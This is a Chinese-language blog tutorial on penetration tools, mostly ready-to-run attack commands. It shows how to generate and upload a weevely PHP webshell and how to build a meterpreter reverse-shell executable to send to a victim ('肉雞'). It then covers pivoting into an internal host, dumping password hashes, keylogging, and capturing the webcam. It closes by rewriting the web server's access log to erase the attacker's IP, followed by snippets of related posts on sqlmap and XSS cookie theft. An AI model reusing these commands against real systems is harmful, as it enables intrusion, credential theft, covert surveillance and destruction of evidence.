簡單滲透工具使用

2022-09-11 03:21:15 字數 1727 閱讀 3331

上傳木馬

windows上一般使用菜刀實現一句話木馬的控制,在linux平台下,也存在類似的工具,如weevely

使用weevely 生成木馬php後上傳後再用其連線

weevely generate test hello.php                   生成的檔案在/usr/share/weevely/hello.php

weevely test          (weevely  url   pass)

使用metersploit

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.201.100 lport=6666 -f exe > 6666.exe  生成木馬發給肉雞

主機設定meter指令碼

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.201.100

set lport 6666

exploit

肉雞上點選該程式,實現連線

以此為跳板:

鏈結乙個埠

portfwd add -l 2222 -r 192.168.201.101 -p 3389

netstat -an | grep "2222" 驗證本地是否開啟了監聽狀態

rdesktop 127.1.1.0:2222 連線上

建立路由

run autoroute -s 192.168.201.101(內網機)

run autoroute -p

getsystem

run hashdump

background 掛起當前會話

接下來可以開始掃瞄相應埠並測試,使用set rhost 192.168.201.101

附meterpreter常用命令:

getsystem #會自動利用各種各樣的系統漏洞來進行許可權提公升

migrate #程序id程序遷移

background #把當前的會話設定為背景,需要的時候在啟用

getuid #檢視對方正在執行的使用者

ps #列出所有的程序

getpid #返回執行meterpreter的id號

sysinfo #產看系統資訊和體系結構

shell #切換到cmd的系統許可權方式

exit #退出shell會話返回meterpreter或終止meterpreter

getdesktop 擷取目標主機當前桌面會話視窗

run webcam -p /var/www #在/var/www目錄監控目標主機的攝像頭

keylog_recorder #使用migrate將會話遷移至explorer.exe的程序空間後記錄鍵盤

觀察日誌資訊

cd /opt/lampp/logs

grep access.log -v 我們的ip -output cleaned.log 過濾網路行為

rm access.log

cp cleaned.log access.log

rm cleaned.log

其他linux下臨時設定ip:ifconfig eth0 192.168.201.100 重啟後失效

滲透工具之nmap使用

一.簡介 nmap是乙個網路連線端掃瞄軟體,用來掃瞄網上電腦開放的網路連線端。確定哪些服務執行在哪些連線端,並且推斷計算機執行哪個作業系統 這是亦稱 fingerprinting 它是網路管理員必用的軟體之一,以及用以評估網路系統安全。二.功能 1.主機發現 掃瞄單個主機 nmap 192.168....

Web滲透工具之 sqlmap的簡單應用

python sqlmap.py開頭的是在windows中執行sqlmap時使用的 sqlmap開頭的是在kali中執行sqlmap時使用的 判斷是否存在注入 python sqlmap.py u sqlmap u 注入點後面的引數大於等於2個時 python sqlmap.py u uid 2 s...

簡單滲透實戰

1.首先在自己的機器上構建web站點 49.232.106.183 6789是我的對映的內網機器web站點 用來接收竊取到的使用者cookie 這裡記得給乙個寫入許可權從而可以成功寫入cookie.txt當中。2.構建惡意url,這裡注意可以將構建的url進行加密 burpsuite或者harbar...